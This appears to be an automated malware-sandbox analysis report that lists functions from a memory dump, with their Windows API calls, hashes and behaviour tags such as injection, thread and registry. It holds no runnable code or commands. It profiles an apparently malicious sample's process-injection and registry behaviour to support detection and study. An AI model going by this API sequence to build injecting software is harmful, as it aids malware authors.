                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$ErrorLastProtect$Query
                                                            • String ID:
                                                            • API String ID: 148356745-0
                                                            • Opcode ID: b8abbdd85196e274176c6855622456bb8cfa86a148fad57c867a5aa1f6465851
                                                            • Instruction ID: e01b0164cb915d7b233d07dafff80c11ef98e7e6e7a27850201b094d250a1faf
                                                            • Opcode Fuzzy Hash: b8abbdd85196e274176c6855622456bb8cfa86a148fad57c867a5aa1f6465851
                                                            • Instruction Fuzzy Hash: 4A010C72900209EF9F119F95DC84D9ABBBDFF1C2557044466F901D7120D771EA24DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA1943, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BA1971
                                                            • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 04BA19FB
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04BA1A09
                                                            • SuspendThread.KERNEL32(?), ref: 04BA1A1C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                            • String ID:
                                                            • API String ID: 3168247402-0
                                                            • Opcode ID: 01965236894a0f425c2f742f98c78b0938ea58d85c02edfd887f08a2252494c7
                                                            • Instruction ID: 7a390d6238e5b4aa02c219b9e64042500e2a7e31c39476efbcaae67f5030d740
                                                            • Opcode Fuzzy Hash: 01965236894a0f425c2f742f98c78b0938ea58d85c02edfd887f08a2252494c7
                                                            • Instruction Fuzzy Hash: 95415EB1108301AFE761DF54C880D7BBBE9FF88354F044A6DF6A492160D731E965CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBDAC2, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExA.KERNEL32(04BB22F6,?,00000000,04BB22F6,00000000,04BB2306,04BB22F6,?,?,?,?,04BBABF7,80000001,?,04BB22F6,04BB2306), ref: 04BBDAE7
                                                            • RtlAllocateHeap.NTDLL(00000000,04BB2306,00000000), ref: 04BBDAFE
                                                            • HeapFree.KERNEL32(00000000,00000000,?,04BBABF7,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBDB19
                                                            • RegQueryValueExA.KERNEL32(04BB22F6,?,00000000,04BB22F6,00000000,04BB2306,?,04BBABF7,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001), ref: 04BBDB38
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateFree
                                                            • String ID:
                                                            • API String ID: 4267586637-0
                                                            • Opcode ID: 432ecbfa422b4c05982735910dd3cfa5d19e35ede9fd97f2cda2031c86ebdb3c
                                                            • Instruction ID: 8b5386bea517a9d1ca6e77b094b102e36763092b070fb18faea44c0544eaaded
                                                            • Opcode Fuzzy Hash: 432ecbfa422b4c05982735910dd3cfa5d19e35ede9fd97f2cda2031c86ebdb3c
                                                            • Instruction Fuzzy Hash: 2D111F76500118FFDB22DF95DC84DEEBBBDEB8D750B104096F941A7210D2B5AE41DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAC5E7, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC606
                                                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC611
                                                            • _wcsupr.NTDLL ref: 04BAC61E
                                                            • lstrlenW.KERNEL32(00000000), ref: 04BAC626
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                            • String ID:
                                                            • API String ID: 2533608484-0
                                                            • Opcode ID: 85cc5beeaea4c129a33922f67a89eb68be3947c3d7993cc022f536da9822427d
                                                            • Instruction ID: 02b63e7cc46606f9b447fd18e7b436d24d993c3445b3ed3a3e90dcf7c83749d8
                                                            • Opcode Fuzzy Hash: 85cc5beeaea4c129a33922f67a89eb68be3947c3d7993cc022f536da9822427d
                                                            • Instruction Fuzzy Hash: B8F0E9311092105FA312AF3D9ECCEBF6ABDEF84B65B14146AF845D3140CE58EC1181B4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAD17E, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BAD19D
                                                              • Part of subcall function 04BB00CA: RtlEnterCriticalSection.NTDLL(00000000), ref: 04BB00D6
                                                              • Part of subcall function 04BB00CA: CloseHandle.KERNEL32(?), ref: 04BB00E4
                                                              • Part of subcall function 04BB00CA: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BB0100
                                                            • CloseHandle.KERNEL32(?), ref: 04BAD1AB
                                                            • InterlockedDecrement.KERNEL32(04BCBFFC), ref: 04BAD1BA
                                                              • Part of subcall function 04BC3A70: SetEvent.KERNEL32(00000404,04BAD1D5), ref: 04BC3A7A
                                                              • Part of subcall function 04BC3A70: CloseHandle.KERNEL32(00000404), ref: 04BC3A8F
                                                              • Part of subcall function 04BC3A70: HeapDestroy.KERNELBASE(05890000), ref: 04BC3A9F
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 04BAD1D6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                            • String ID:
                                                            • API String ID: 1141245775-0
                                                            • Opcode ID: d24439e9456d61b7a12231083a301f1fba6721ad2d0dbb0a8c77a36a8955658d
                                                            • Instruction ID: b8d94077ea1ebef6bda012576c5f71bdab04bfc3874278ee3b74817c61e043d4
                                                            • Opcode Fuzzy Hash: d24439e9456d61b7a12231083a301f1fba6721ad2d0dbb0a8c77a36a8955658d
                                                            • Instruction Fuzzy Hash: 24F0A4315002046FD7019B7ACC89E6A3B78FB4A730B100299F526A32C0DB74AC128B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB7629, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BB764F
                                                            • memcpy.NTDLL ref: 04BB7677
                                                              • Part of subcall function 04BA4173: NtAllocateVirtualMemory.NTDLL(04BA489B,00000000,00000000,04BA489B,00003000,00000040), ref: 04BA41A4
                                                              • Part of subcall function 04BA4173: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA41AB
                                                              • Part of subcall function 04BA4173: SetLastError.KERNEL32(00000000), ref: 04BA41B2
                                                            • GetLastError.KERNEL32(00000010,00000218,04BC4EAD,00000100,?,00000318,00000008), ref: 04BB768E
                                                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BC4EAD,00000100), ref: 04BB7771
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                            • String ID:
                                                            • API String ID: 685050087-0
                                                            • Opcode ID: 4e9cfee232f05dd57bc6769b2cfd660655028d7801d4d310407070310b415dfd
                                                            • Instruction ID: c2c8af73834ff27b90d193cb1587d15e62cfdd29fc5a4f7a8b16941d22a4f29a
                                                            • Opcode Fuzzy Hash: 4e9cfee232f05dd57bc6769b2cfd660655028d7801d4d310407070310b415dfd
                                                            • Instruction Fuzzy Hash: A04183B1504301AFD720DF29DD81FABBBF9EB88314F00496DF999C6250EB70E5148BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBAB7B, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BAAB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 04BAABBE
                                                              • Part of subcall function 04BAAB88: lstrcpy.KERNEL32(00000000,00000000), ref: 04BAABE2
                                                              • Part of subcall function 04BAAB88: lstrcat.KERNEL32(00000000,00000000), ref: 04BAABEA
                                                            • RegOpenKeyExA.KERNEL32(04BBAB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABC2
                                                            • RegOpenKeyExA.ADVAPI32(04BBAB63,04BBAB63,00000000,00020019,80000001,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBABD8
                                                            • RegCloseKey.ADVAPI32(80000001,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBAC21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Open$Closelstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 4131162436-0
                                                            • Opcode ID: dea0da118ef77e0a54882b79e81065f73e95d8bf764e9d9caca13ec7f342aacc
                                                            • Instruction ID: 28d9c64960158862d2f57fa6758d2c0e4c89e76f04c11d03efeaae984dbbad48
                                                            • Opcode Fuzzy Hash: dea0da118ef77e0a54882b79e81065f73e95d8bf764e9d9caca13ec7f342aacc
                                                            • Instruction Fuzzy Hash: D5211D75A00209BFDB11DF95DCC1CEEBBBDEB4C214B1440AAEA44E3111E774AE55DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC1736, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                            • RegOpenKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC1755
                                                            • lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateOpenlstrlen
                                                            • String ID:
                                                            • API String ID: 2865187142-0
                                                            • Opcode ID: ac0861311e17684087ac1f41b95419f50f86956b0315974c87e93a7c7eb6eda1
                                                            • Instruction ID: 8d50f2dafc7967b08f9673774e4a69ca054da445e2c0fb466c615afb481bda33
                                                            • Opcode Fuzzy Hash: ac0861311e17684087ac1f41b95419f50f86956b0315974c87e93a7c7eb6eda1
                                                            • Instruction Fuzzy Hash: C2F062B6144208BFEB119F94DCC5EAA7B6CEB46364F10404AFE4596140E670AA44CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC3A70, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEvent.KERNEL32(00000404,04BAD1D5), ref: 04BC3A7A
                                                              • Part of subcall function 04BA6975: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA699E
                                                              • Part of subcall function 04BA6975: RtlDeleteCriticalSection.NTDLL(04BCC2E0), ref: 04BA69D1
                                                              • Part of subcall function 04BA6975: RtlDeleteCriticalSection.NTDLL(04BCC300), ref: 04BA69D8
                                                              • Part of subcall function 04BA6975: CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A07
                                                              • Part of subcall function 04BA6975: ReleaseMutex.KERNEL32(00000428,00000000,?,?,?,04BC3A85), ref: 04BA6A18
                                                              • Part of subcall function 04BA6975: CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A24
                                                              • Part of subcall function 04BA6975: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BC3A85), ref: 04BA6A30
                                                              • Part of subcall function 04BA6975: CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A3C
                                                              • Part of subcall function 04BA6975: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA6A42
                                                              • Part of subcall function 04BA6975: SleepEx.KERNEL32(00000064,00000001,?,?,04BC3A85), ref: 04BA6A56
                                                              • Part of subcall function 04BA6975: HeapFree.KERNEL32(00000000,00000000,?,?,04BC3A85), ref: 04BA6A79
                                                              • Part of subcall function 04BA6975: RtlRemoveVectoredExceptionHandler.NTDLL(050305B8), ref: 04BA6AB2
                                                            • CloseHandle.KERNEL32(00000404), ref: 04BC3A8F
                                                            • HeapDestroy.KERNELBASE(05890000), ref: 04BC3A9F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                                            • String ID:
                                                            • API String ID: 1636361345-0
                                                            • Opcode ID: 605628de441c9e777f52e5c5fc3e087685c10701e5e2f91d3b4937a03519c69b
                                                            • Instruction ID: f265fa5d02d1c5c2b407cffd7d9f5eebde677ecf270801a324515dc8eba8eb4e
                                                            • Opcode Fuzzy Hash: 605628de441c9e777f52e5c5fc3e087685c10701e5e2f91d3b4937a03519c69b
                                                            • Instruction Fuzzy Hash: 0EE042B07003019FAB149F76E8CCA1A37F8FA1D641399945ABA55E7140EA28E8228A34
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA9A1F, Relevance: 3.1, APIs: 2, Instructions: 81registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RegQueryValueExA.KERNEL32(04BA81F8,00000000,00000000,?,04BCB06C,?,00000001,04BA81F8,00000001,00000000,73B74D40,?,?,?,00000000,04BA81F8), ref: 04BA9A73
                                                            • RegCloseKey.ADVAPI32(04BA81F8,?,?,?,00000000,04BA81F8), ref: 04BA9ABE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCreateQueryValuelstrlen
                                                            • String ID:
                                                            • API String ID: 971780412-0
                                                            • Opcode ID: 29fab205bb75c868ac86f519c0e55b9ba89579428826bf03a84ed111b869efc7
                                                            • Instruction ID: 2c8e00e0721ca5388a676cbc8e4004f8df254281a844a20e35d7967daf9989be
                                                            • Opcode Fuzzy Hash: 29fab205bb75c868ac86f519c0e55b9ba89579428826bf03a84ed111b869efc7
                                                            • Instruction Fuzzy Hash: 1B3148B1D04219EFDB21DFA5E8C19AEBBB8FB08750F0045ABE914A3250D7746E51DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC28B5, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,04BCB7A0,-0000000C,00000000,00000000), ref: 04BC28E5
                                                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,04BCB7A0,-0000000C,00000000), ref: 04BC292C
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                            • String ID:
                                                            • API String ID: 552344955-0
                                                            • Opcode ID: 9a6c649369ce2730fa5ec174e9eb5782fe24875288ea9afe2315248384a316e7
                                                            • Instruction ID: 71462558c73cc14980eb6af7249702601b297e683199fad5f5861a6031bdd520
                                                            • Opcode Fuzzy Hash: 9a6c649369ce2730fa5ec174e9eb5782fe24875288ea9afe2315248384a316e7
                                                            • Instruction Fuzzy Hash: EA118271D00308ABD7159FA9D8C4BAEBBF8EF95755F5080EDE801A7240DBB4AA01CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB9E27, Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000000,00000001,?,00000001,00000000), ref: 04BB9E68
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BB9EBC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCreateQueryValuelstrlen
                                                            • String ID:
                                                            • API String ID: 971780412-0
                                                            • Opcode ID: 7ed1068de05b66fef7d1dbe449807102ac7b92ff4b10d0a4d290863bfd4adb11
                                                            • Instruction ID: 7aeec38ea88e1f2dc62bdcec0f95a01830af2677fb9fe6bbb47b60c76438e37a
                                                            • Opcode Fuzzy Hash: 7ed1068de05b66fef7d1dbe449807102ac7b92ff4b10d0a4d290863bfd4adb11
                                                            • Instruction Fuzzy Hash: 10110D71900218EFEF10DFA5DC85FEEBBB8EB48714F1004A6EA44B7150D774AA45DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB5A47, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,04BA81F3,69B25F44,?,?,00000000), ref: 04BB5A84
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB5AE5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Time$FileFreeHeapSystem
                                                            • String ID:
                                                            • API String ID: 892271797-0
                                                            • Opcode ID: 5ec23872e9cb0b0fd45e770934c1048bfb16099cf5a9bdeef55d974a1ece1480
                                                            • Instruction ID: 54a83733751fa8ae027705f16beb8be9c98ea4f79d2787c66239d0ba37159fe8
                                                            • Opcode Fuzzy Hash: 5ec23872e9cb0b0fd45e770934c1048bfb16099cf5a9bdeef55d974a1ece1480
                                                            • Instruction Fuzzy Hash: 1E11FBB5901108FBDF10DBA4D984AEE77B8EB08309F100492A545F7150DB78BA54DF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BACFBA, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BACFC4
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BAD000
                                                              • Part of subcall function 04BA2577: lstrlen.KERNEL32(?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25C4
                                                              • Part of subcall function 04BA2577: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25D6
                                                              • Part of subcall function 04BA2577: lstrcpy.KERNEL32(00000000,?), ref: 04BA25E5
                                                              • Part of subcall function 04BA2577: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25F6
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1872894792-0
                                                            • Opcode ID: cdcd791d3c70e3bb8c2389743c3ae62a1286b97fe6dda85631fe2602fa59d212
                                                            • Instruction ID: f3e3cde93be3fab80aaaeb4b7d82f9c2156dbef4dcae263d3cdb005ef1842852
                                                            • Opcode Fuzzy Hash: cdcd791d3c70e3bb8c2389743c3ae62a1286b97fe6dda85631fe2602fa59d212
                                                            • Instruction Fuzzy Hash: 99F0EC766052159F87206F58E4C4C39FFB8FB9951530501CFE91AB7310CA767C11C6D0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA26E2, Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(04BCBFFC), ref: 04BA26F7
                                                              • Part of subcall function 04BA1305: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BA1330
                                                              • Part of subcall function 04BA1305: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04BA133D
                                                              • Part of subcall function 04BA1305: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BA13C9
                                                              • Part of subcall function 04BA1305: GetModuleHandleA.KERNEL32(00000000), ref: 04BA13D4
                                                              • Part of subcall function 04BA1305: RtlImageNtHeader.NTDLL(00000000), ref: 04BA13DD
                                                              • Part of subcall function 04BA1305: RtlExitUserThread.NTDLL(00000000), ref: 04BA13F2
                                                            • InterlockedDecrement.KERNEL32(04BCBFFC), ref: 04BA271B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                            • String ID:
                                                            • API String ID: 1011034841-0
                                                            • Opcode ID: 7e82a4a6e7029a507cc88209b26a1ad6a248388d1637b7a7e3873bb90d357d99
                                                            • Instruction ID: 425ed050986e8a8fae3cafcd9c63932c0da48d703934cec8d337e4377f9d873f
                                                            • Opcode Fuzzy Hash: 7e82a4a6e7029a507cc88209b26a1ad6a248388d1637b7a7e3873bb90d357d99
                                                            • Instruction Fuzzy Hash: DEE0123120C12167971E5E7598C4B6E7791FB547C1F0045D9F542D1260E610FE608B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA15BD, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BBB94E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB987
                                                              • Part of subcall function 04BBB94E: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BBB9BD
                                                              • Part of subcall function 04BBB94E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB9C9
                                                              • Part of subcall function 04BBB94E: lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA06
                                                              • Part of subcall function 04BBB94E: StrChrA.SHLWAPI(?,0000002E), ref: 04BBBA0F
                                                              • Part of subcall function 04BBB94E: lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA21
                                                              • Part of subcall function 04BBB94E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BBBA72
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,04BC85A0,0000002C,04BA9E85,05C88E6E,?,00000000,04BB765C), ref: 04BA15FC
                                                              • Part of subcall function 04BA6EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04BA6ED9
                                                              • Part of subcall function 04BA6EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BA9375,00000000,00000000,00000028,00000100), ref: 04BA6EFB
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BC85A0,0000002C,04BA9E85,05C88E6E,?,00000000,04BB765C,?,00000318), ref: 04BA1687
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                            • String ID:
                                                            • API String ID: 4138075514-0
                                                            • Opcode ID: f831deecb6de27cc7e9abbc8ac197efdbbb98e77a39e5fc84551a5d564cd0c03
                                                            • Instruction ID: 74e19c3d701f141bdd4588cdc69646c8876f9f92dd750ea58a6c0001110ca2a9
                                                            • Opcode Fuzzy Hash: f831deecb6de27cc7e9abbc8ac197efdbbb98e77a39e5fc84551a5d564cd0c03
                                                            • Instruction Fuzzy Hash: D4211571D01228EFCF619FA9CC80ADEBBB5FF08720F18816AE914B6150C3746A51CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBA4E9, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000001,00000000,73B74D40,?,?,00000000,04BA81E2), ref: 04BBA4FE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 780510a620ffd435240a5abf5e9c360bed217682ca98f934117ba1114de159de
                                                            • Instruction ID: bc28029087ad0a12111544f77b4e69575d066d59526d65100973e856c774735e
                                                            • Opcode Fuzzy Hash: 780510a620ffd435240a5abf5e9c360bed217682ca98f934117ba1114de159de
                                                            • Instruction Fuzzy Hash: 5D311A72E44208EFDB10DF99D8C19ADBBB5FB4C324B5580EAD645AB200D674BE41CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAA046, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(04BBC493,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BAA081
                                                              • Part of subcall function 04BB0FA5: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,04BCC300), ref: 04BB0FBC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleInformationModuleProcessQuery
                                                            • String ID:
                                                            • API String ID: 2776635927-0
                                                            • Opcode ID: f942563138b34e50860529b98b109c510fb11178497652ffb85ad367a93459b7
                                                            • Instruction ID: b7605ec0683d2cb00e46105a188d8ef2307373643b2dc681fb56695a7bcf9f04
                                                            • Opcode Fuzzy Hash: f942563138b34e50860529b98b109c510fb11178497652ffb85ad367a93459b7
                                                            • Instruction Fuzzy Hash: 7B217275604204AFEB30DF79C580E6A77A9EF4C39471484AAE985CB250E771FD10DB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB17BC, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04BB180E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
